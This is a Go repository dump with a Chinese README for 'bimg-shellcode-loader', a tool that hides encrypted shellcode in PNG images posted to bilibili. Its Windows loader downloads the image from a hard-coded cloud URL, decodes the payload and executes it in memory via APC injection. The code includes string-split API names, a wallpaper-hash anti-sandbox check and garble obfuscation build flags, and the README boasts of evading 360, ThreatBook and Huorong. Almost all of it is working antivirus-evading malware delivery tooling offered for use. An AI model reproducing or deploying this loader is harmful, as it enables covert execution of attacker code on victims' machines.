├── .gitignore ├── README.md ├── cmd ├── generate │ └── generate.go └── shellcodeLoader │ └── shellcodeLoader.go ├── crypt ├── base64.go ├── des.go └── steg.go ├── doc ├── img.png ├── img2.png ├── img3.png ├── img4.png ├── img5.png ├── img6.png ├── img7.png └── img8.jpeg ├── go.mod ├── go.sum ├── image ├── generate.go └── getShellcode.go └── loader └── loader.go /.gitignore: -------------------------------------------------------------------------------- 1 | /.idea/ 2 | /test/ 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bimg-shellcode-loader 2 | bimg-shellcode-loader是一个使用bilibili图片隐写功能加载shellcode的工具。 当然你可以使用任何地方的图片。 3 | 4 | 在调研C2通讯方式时,发现有一个有师傅使用了bilbili图片隐写功能加载shellcode,觉得这个方法很有意思,就自己写了一个工具。添加了反沙箱功能。 5 | 如果这个项目对你有帮助,欢迎star。 6 | 7 | ### 使用步骤 8 | ##### 1. 生成包含隐写信息的图片 9 | 使用generate.go生成包含shellcode的图片,生成的图片为out_file.png。 10 | 在generate.go同级目录下存放shellcode文件,shellcode文件名为shellcode.bin。 11 | 图片为img.png, 随后用运行generate.go生成out_file.png。 12 | ```shell 13 | go run generate.go 14 | ``` 15 | 16 | ##### 2. 上传图片到bilibili 17 | 登陆访问创作中心 https://member.bilibili.com/platform/upload/text/edit 点击上传图片,把生成的图片上传上去。 18 | ![img.png](doc/img.png) 19 | 20 | 通过浏览器开发者工具,查看上传图片的请求,找到图片的返回地址,复制下来。 21 | 22 | ![img.png](doc/img2.png) 23 | 24 | 把图片地址填入到shellcodeLoader.go中的`imgUrl`变量中。 25 | 26 | ![img.png](doc/img3.png) 27 | ##### 3. 
编译加载器 28 | ```go 29 | CGO_ENABLED=0 GOOS=windows GOARCH=amd64 GOPRIVATE=* GOGARBLE=* garble -tiny -literals -seed=random build -ldflags "-w -s -buildid= -H=windowsgui" -buildmode="pie" 30 | ``` 31 | 32 | ### 免杀 33 | 只测试了360和微步 34 | ![img.png](doc/img4.png) 35 | 36 | 微步反沙箱,判断当前系统壁纸,如果是沙箱内的壁纸就退出。大家有遇到的沙箱或者分析机,提取壁纸的md5放入列表中。 37 | ```go 38 | md5List := []string{"fbfeb6772173fef2213992db05377231", "49150f7bfd879fe03a2f7d148a2514de", "fc322167eb838d9cd4ed6e8939e78d89", "178aefd8bbb4dd3ed377e790bc92a4eb", "0f8f1032e4afe1105a2e5184c61a3ce4", "da288dceaafd7c97f1b09c594eac7868"} 39 | ``` 40 | 微步沙箱检测通过0/24,并且没有检测到网络通信。 41 | ![img_1.png](doc/img5.png) 42 | ![img.png](doc/img6.png) 43 | 44 | 火绒 45 | ![img8.jpeg](doc%2Fimg8.jpeg) 46 | 47 | virscan扫描结果 48 | ![img7.png](doc%2Fimg7.png) 49 | ## Stargazers over time 50 | 51 | [![Stargazers over time](https://starchart.cc/intbjw/bimg-shellcode-loader.svg)](https://starchart.cc/intbjw/bimg-shellcode-loader) 52 | 53 | #### Visitors (Since 2023/08/01) 54 |
57 | -------------------------------------------------------------------------------- /cmd/generate/generate.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bimg-shellcode-loader/image" 5 | "os" 6 | ) 7 | 8 | func main() { 9 | // 打开shell.bin文件,获取byte数组 10 | shellcode, _ := os.ReadFile("shell.bin") 11 | image.Generate("img.png", shellcode) 12 | 13 | } 14 | -------------------------------------------------------------------------------- /cmd/shellcodeLoader/shellcodeLoader.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bimg-shellcode-loader/loader" 5 | "crypto/md5" 6 | "encoding/hex" 7 | "fmt" 8 | "github.com/reujab/wallpaper" 9 | "io" 10 | "os" 11 | ) 12 | 13 | func main() { 14 | 15 | checkDesktopMd5() 16 | loader.Loader("https://txycct-1305644927.cos.ap-nanjing.myqcloud.com/file/out_file.png") 17 | } 18 | 19 | func checkDesktopMd5() { 20 | // 获取当前桌面壁纸路径 21 | path, err := wallpaper.Get() 22 | if err != nil { 23 | fmt.Println(err.Error()) 24 | } 25 | 26 | // 计算文件的MD5值 27 | file, err := os.Open(path) 28 | if err != nil { 29 | fmt.Println(err.Error()) 30 | } 31 | defer file.Close() 32 | 33 | hash := md5.New() 34 | if _, err := io.Copy(hash, file); err != nil { 35 | fmt.Println(err.Error()) 36 | } 37 | 38 | md5value := hex.EncodeToString(hash.Sum(nil)) 39 | // md5值列表 40 | md5List := []string{"fbfeb6772173fef2213992db05377231", "49150f7bfd879fe03a2f7d148a2514de", "fc322167eb838d9cd4ed6e8939e78d89", "178aefd8bbb4dd3ed377e790bc92a4eb", "0f8f1032e4afe1105a2e5184c61a3ce4", "da288dceaafd7c97f1b09c594eac7868"} 41 | // 判断md5值是否在列表中 42 | for _, value := range md5List { 43 | if value == md5value { 44 | // 程序退出 45 | os.Exit(0) 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /crypt/base64.go: -------------------------------------------------------------------------------- 1 
| package crypt 2 | 3 | import ( 4 | "encoding/base64" 5 | ) 6 | 7 | // 自定义base64编码表 8 | const base64Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" 9 | 10 | // 自定义base64编码 11 | func CustomBase64Encode(data []byte) string { 12 | // 创建一个自定义base64编码器 13 | encoder := base64.NewEncoding(ShuffleString(base64Table)) 14 | 15 | // 编码数据 16 | encoded := encoder.EncodeToString(data) 17 | 18 | return encoded 19 | } 20 | 21 | // 自定义base64解码 22 | func CustomBase64Decode(encoded string) ([]byte, error) { 23 | // 创建一个自定义base64解码器 24 | decoder := base64.NewEncoding(ShuffleString(base64Table)) 25 | 26 | // 解码数据 27 | decoded, err := decoder.DecodeString(encoded) 28 | if err != nil { 29 | return nil, err 30 | } 31 | 32 | return decoded, nil 33 | } 34 | 35 | func ShuffleString(s string) string { 36 | // 将字符串转换为rune数组 37 | runes := []rune(s) 38 | 39 | // 打乱rune数组顺序 40 | for inter := len(runes) - 1; inter > 0; inter-- { 41 | jnter := inter - 1 42 | if jnter < 0 { 43 | jnter = 0 44 | } 45 | runes[inter], runes[jnter] = runes[jnter], runes[inter] 46 | } 47 | 48 | // 将rune数组转换为字符串 49 | return string(runes) 50 | } 51 | -------------------------------------------------------------------------------- /crypt/des.go: -------------------------------------------------------------------------------- 1 | package crypt 2 | 3 | import ( 4 | "bytes" 5 | "crypto/cipher" 6 | "crypto/des" 7 | ) 8 | 9 | // 使用DES CFB模式进行加密 10 | func DesEncrypt(origData, key, iv []byte) ([]byte, error) { 11 | // 创建一个DES密码分组 12 | block, err := des.NewCipher(key) 13 | if err != nil { 14 | return nil, err 15 | } 16 | 17 | // 对原始数据进行填充 18 | origData = pkcs7Padding(origData, block.BlockSize()) 19 | 20 | // 创建一个CFB加密模式 21 | cfb := cipher.NewCFBEncrypter(block, iv) 22 | 23 | // 加密数据 24 | encrypted := make([]byte, len(origData)) 25 | cfb.XORKeyStream(encrypted, origData) 26 | 27 | return encrypted, nil 28 | } 29 | 30 | // 使用DES CFB模式进行解密 31 | func DesDecrypt(encryptedData, key, iv []byte) ([]byte, error) { 
32 | // 创建一个DES密码分组 33 | block, err := des.NewCipher(key) 34 | if err != nil { 35 | return nil, err 36 | } 37 | 38 | // 创建一个CFB解密模式 39 | cfb := cipher.NewCFBDecrypter(block, iv) 40 | 41 | // 解密数据 42 | decrypted := make([]byte, len(encryptedData)) 43 | cfb.XORKeyStream(decrypted, encryptedData) 44 | 45 | // 对解密后的数据进行去填充 46 | decrypted = pkcs7UnPadding(decrypted) 47 | 48 | return decrypted, nil 49 | } 50 | 51 | // PKCS7填充 52 | func pkcs7Padding(ciphertext []byte, blockSize int) []byte { 53 | padding := blockSize - len(ciphertext)%blockSize 54 | padtext := bytes.Repeat([]byte{byte(padding)}, padding) 55 | return append(ciphertext, padtext...) 56 | } 57 | 58 | // PKCS7去填充 59 | func pkcs7UnPadding(origData []byte) []byte { 60 | length := len(origData) 61 | unpadding := int(origData[length-1]) 62 | return origData[:(length - unpadding)] 63 | } 64 | -------------------------------------------------------------------------------- /crypt/steg.go: -------------------------------------------------------------------------------- 1 | package crypt 2 | 3 | import ( 4 | "bufio" 5 | "bytes" 6 | "github.com/auyer/steganography" 7 | "image/png" 8 | "io" 9 | "log" 10 | "os" 11 | ) 12 | 13 | func StegEncode(imgFile string, msg []byte) { 14 | 15 | inFile, _ := os.Open(imgFile) 16 | reader := bufio.NewReader(inFile) 17 | img, _ := png.Decode(reader) 18 | www := new(bytes.Buffer) // buffer that will recieve the results 19 | err := steganography.Encode(www, img, msg) // Encode the message into the image 20 | if err != nil { 21 | log.Printf("Error Encoding file %v", err) 22 | return 23 | } 24 | outFile, _ := os.Create("out_file.png") // create file 25 | www.WriteTo(outFile) // write buffer to it 26 | outFile.Close() 27 | } 28 | 29 | func StegDecode(imgReader io.Reader) []byte { 30 | reader := bufio.NewReader(imgReader) 31 | img, _ := png.Decode(reader) 32 | sizeOfMessage := steganography.GetMessageSizeFromImage(img) 33 | msg := steganography.Decode(sizeOfMessage, img) 34 | return msg 35 | 
} 36 | -------------------------------------------------------------------------------- /doc/img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img.png -------------------------------------------------------------------------------- /doc/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img2.png -------------------------------------------------------------------------------- /doc/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img3.png -------------------------------------------------------------------------------- /doc/img4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img4.png -------------------------------------------------------------------------------- /doc/img5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img5.png -------------------------------------------------------------------------------- /doc/img6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img6.png -------------------------------------------------------------------------------- /doc/img7.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img7.png -------------------------------------------------------------------------------- /doc/img8.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img8.jpeg -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module bimg-shellcode-loader 2 | 3 | go 1.20 4 | 5 | require ( 6 | github.com/auyer/steganography v1.0.2 7 | github.com/go-resty/resty/v2 v2.7.0 8 | github.com/reujab/wallpaper v0.0.0-20210630195606-5f9f655b3740 9 | golang.org/x/sys v0.10.0 10 | ) 11 | 12 | require ( 13 | golang.org/x/net v0.0.0-20211029224645-99673261e6eb // indirect 14 | gopkg.in/ini.v1 v1.62.0 // indirect 15 | gopkg.in/yaml.v2 v2.4.0 // indirect 16 | ) 17 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/auyer/steganography v1.0.2 h1:G5iZbX8QUvw+kCLyK+59hY8t/oSSpSS5yStIcPCGIgU= 2 | github.com/auyer/steganography v1.0.2/go.mod h1:Q2qN+f1ixaXnKTCT4xkSDCZ/5NiOpUeTgOCLwQdJD+A= 3 | github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY= 4 | github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I= 5 | github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1 h1:EGx4pi6eqNxGaHF6qqu48+N2wcFQ5qg5FXgOdqsJ5d8= 6 | github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY= 7 | github.com/jtolds/gls v4.20.0+incompatible h1:xdiiI2gbIgH/gLH7ADydsJ1uDOEzR8yvV7C0MuV77Wo= 8 | github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU= 9 | 
github.com/reujab/wallpaper v0.0.0-20210630195606-5f9f655b3740 h1:X6IDPPN+zrSClp0Q+JiERA//d8L0WcU5MqcGeulCW1A= 10 | github.com/reujab/wallpaper v0.0.0-20210630195606-5f9f655b3740/go.mod h1:WYwPVmM/8szeItLeWkwZSLRvQgrvsvstRzgznR8+E4Q= 11 | github.com/smartystreets/assertions v0.0.0-20180927180507-b2de0cb4f26d h1:zE9ykElWQ6/NYmHa3jpm/yHnI4xSofP+UP6SpjHcSeM= 12 | github.com/smartystreets/assertions v0.0.0-20180927180507-b2de0cb4f26d/go.mod h1:OnSkiWE9lh6wB0YB77sQom3nweQdgAjqCqsofrRNTgc= 13 | github.com/smartystreets/goconvey v1.6.4 h1:fv0U8FUIMPNf1L9lnHLvLhgicrIVChEkdzIKYqbNC9s= 14 | github.com/smartystreets/goconvey v1.6.4/go.mod h1:syvi0/a8iFYH4r/RixwvyeAJjdLS9QV7WQ/tjFTllLA= 15 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 16 | golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 17 | golang.org/x/net v0.0.0-20211029224645-99673261e6eb h1:pirldcYWx7rx7kE5r+9WsOXPXK0+WH5+uZ7uPmJ44uM= 18 | golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 19 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 20 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 21 | golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 22 | golang.org/x/sys v0.10.0 h1:SqMFp9UcQJZa+pmYuAKjd9xq1f0j5rLcDIk0mj4qAsA= 23 | golang.org/x/sys v0.10.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 24 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= 25 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 26 | golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 27 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod 
h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 28 | golang.org/x/tools v0.0.0-20190328211700-ab21143f2384/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= 29 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= 30 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 31 | gopkg.in/ini.v1 v1.62.0 h1:duBzk771uxoUuOlyRLkHsygud9+5lrlGjdFBb4mSKDU= 32 | gopkg.in/ini.v1 v1.62.0/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k= 33 | gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= 34 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 35 | -------------------------------------------------------------------------------- /image/generate.go: -------------------------------------------------------------------------------- 1 | package image 2 | 3 | import ( 4 | "bimg-shellcode-loader/crypt" 5 | ) 6 | 7 | func Generate(imgFile string, shellcode []byte) { 8 | encryptShellcode, _ := crypt.DesEncrypt(shellcode, []byte("12345678"), []byte("87654321")) 9 | // 对encryptShellcode进行base64编码 10 | base64Shellcode := crypt.CustomBase64Encode(encryptShellcode) 11 | // 对base64Shellcode进行steg编码 12 | crypt.StegEncode(imgFile, []byte(base64Shellcode)) 13 | } 14 | -------------------------------------------------------------------------------- /image/getShellcode.go: -------------------------------------------------------------------------------- 1 | package image 2 | 3 | import ( 4 | "bimg-shellcode-loader/crypt" 5 | "bytes" 6 | "fmt" 7 | "github.com/go-resty/resty/v2" 8 | "os" 9 | ) 10 | 11 | // GetShellcode 从b站上下载图片,获取shellcode 12 | func GetShellcode(url string) []byte { 13 | // 使用resty下载 14 | resp, err := resty.New().R().Get(url) 15 | if err != nil { 16 | fmt.Println(err.Error()) 17 | os.Exit(0) 18 | } 19 | //获取返回值 20 | reader := bytes.NewReader(resp.Body()) 21 | msg := crypt.StegDecode(reader) 22 | // 对msg进行base64解码 23 | 
shellcode, _ := crypt.CustomBase64Decode(string(msg)) 24 | // 对shellcode进行des解密 25 | shellcode, _ = crypt.DesDecrypt(shellcode, []byte("12345678"), []byte("87654321")) 26 | return shellcode 27 | } 28 | -------------------------------------------------------------------------------- /loader/loader.go: -------------------------------------------------------------------------------- 1 | package loader 2 | 3 | import ( 4 | "bimg-shellcode-loader/image" 5 | "fmt" 6 | "golang.org/x/sys/windows" 7 | "log" 8 | "unsafe" 9 | ) 10 | 11 | const ( 12 | // MEM_COMMIT is a Windows constant used with Windows API calls 13 | MEM_COMMIT = 0x1000 14 | // MEM_RESERVE is a Windows constant used with Windows API calls 15 | MEM_RESERVE = 0x2000 16 | // PAGE_EXECUTE_READ is a Windows constant used with Windows API calls 17 | PAGE_EXECUTE_READ = 0x20 18 | // PAGE_READWRITE is a Windows constant used with Windows API calls 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | // https://docs.microsoft.com/en-us/windows/win32/midl/enum 23 | const ( 24 | QUEUE_USER_APC_FLAGS_NONE = iota 25 | QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC 26 | QUEUE_USER_APC_FLGAS_MAX_VALUE 27 | ) 28 | 29 | const ( 30 | apple = "k" + "e" + "r" + "n" + "e" + "l" + "3" + "2" + ".d" + "l" + "l" 31 | banana = "n" + "t" + "d" + "l" + "l" + ".d" + "l" + "l" 32 | cherry = "V" + "i" + "r" + "t" + "u" + "a" + "l" + "A" + "l" + "l" + "o" + "c" 33 | date = "V" + "i" + "r" + "t" + "u" + "a" + "l" + "P" + "r" + "o" + "t" + "e" + "c" + "t" 34 | elderberry = "G" + "e" + "t" + "C" + "u" + "r" + "r" + "e" + "n" + "t" + "T" + "h" + "r" + "e" + "a" + "d" 35 | fig = "R" + "t" + "l" + "C" + "o" + "p" + "y" + "M" + "e" + "m" + "o" + "r" + "y" 36 | grapefruit = "N" + "t" + "Q" + "u" + "e" + "u" + "e" + "A" + "p" + "c" + "T" + "h" + "r" + "e" + "a" + "d" + "E" + "x" 37 | ) 38 | 39 | func Loader(url string) { 40 | // 随便写一些代码,让编译器不要优化掉 41 | 42 | // 从b站上下载图片,获取shellcode 43 | shellcode := image.GetShellcode(url) 44 | 45 | // Pop Calc Shellcode 46 | 47 | abc 
:= windows.NewLazySystemDLL(apple) 48 | bcd := windows.NewLazySystemDLL(banana) 49 | 50 | cde := abc.NewProc(cherry) 51 | def := abc.NewProc(date) 52 | fed := abc.NewProc(elderberry) 53 | ert := bcd.NewProc(fig) 54 | qwe := bcd.NewProc(grapefruit) 55 | 56 | addr, _, errcde := cde.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE) 57 | 58 | if errcde != nil && errcde.Error() != "The operation completed successfully." { 59 | log.Fatal(fmt.Sprintf("[!]Error calling cde:\r\n%s", errcde.Error())) 60 | } 61 | 62 | if addr == 0 { 63 | log.Fatal("[!]cde failed and returned 0") 64 | } 65 | 66 | _, _, errert := ert.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 67 | 68 | if errert != nil && errert.Error() != "The operation completed successfully." { 69 | log.Fatal(fmt.Sprintf("[!]Error calling ert:\r\n%s", errert.Error())) 70 | } 71 | 72 | oldProtect := PAGE_READWRITE 73 | _, _, errdef := def.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 74 | if errdef != nil && errdef.Error() != "The operation completed successfully." { 75 | log.Fatal(fmt.Sprintf("Error calling def:\r\n%s", errdef.Error())) 76 | } 77 | 78 | thread, _, err := fed.Call() 79 | if err.Error() != "The operation completed successfully." { 80 | log.Fatal(fmt.Sprintf("Error calling fed:\n%s", err)) 81 | } 82 | 83 | //USER_APC_OPTION := uintptr(QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC) 84 | _, _, err = qwe.Call(thread, QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC, uintptr(addr), 0, 0, 0) 85 | if err.Error() != "The operation completed successfully." { 86 | log.Fatal(fmt.Sprintf("Error calling qwe:\n%s", err)) 87 | } 88 | 89 | } 90 | --------------------------------------------------------------------------------